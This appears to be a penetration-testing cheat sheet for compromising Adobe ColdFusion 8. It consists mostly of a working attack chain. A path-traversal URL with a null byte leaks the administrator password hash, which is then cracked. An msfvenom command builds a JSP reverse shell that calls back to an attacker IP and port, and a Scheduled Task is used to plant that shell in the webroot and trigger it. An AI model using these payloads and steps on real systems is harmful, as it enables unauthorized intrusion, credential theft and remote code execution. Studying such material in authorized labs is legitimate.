The default path contain 'cfide'
http://10.0.0.1/cfide/images
http://10.0.0.1/cfide/scripts
http://10.0.0.1/cfide/administrator
http://10.0.0.1/cfide/classes
http://10.0.0.1/cfide/debug
http://10.0.0.1/cfide/wizards
Searchsploit : multiple/remote/14641.py
➤ 1. Extract the hash of the password
http://10.0.0.1/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColfFusion8/lib/password.properties%00en
Exemple : password=AAFDC23870ECBCD3D557B6423A8982134E17927E
➤ 2. Crack the hash (sha1)
https://crackstation.net
➤ 1. Connection to the interface
http://10.0.0.1/CFIDE/administrator/index.cfm
➤ 2. Create a java reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.194 LPORT=443 -f raw > exploit.jsp
➤ 3. Create a HTTP server in order to download the reverse shell
python3 -m http.server
➤ 4. Detect the mappings
From the menu, go to 'Server Settings' then 'Mappings'. In the 'Active ColdFusion Mappings', retain the directory path.
Ex: C:\Inetpub\wwwroot\CFIDE
➤ 5. Upload the reverse shell
From the menu, go to 'Debugging & Logging' then 'Scheduled Tasks'. Finally complete the information as listed below:
• Taskname : Name of the task
• Frequency : One time (executed one time)
• URL : Local http url where the exploit is located
• Publish : Selected
• File: The path discover in the mapping part and the name of the exploit (ex: C:\Inetpub\wwwroot\CFIDE\exploit.jsp)
• The screenshot below provide an example
➤ 6. Click on submit
➤ 7. Browse the exploit path
http://10.0.0.1/CFIDE/exploit.jsp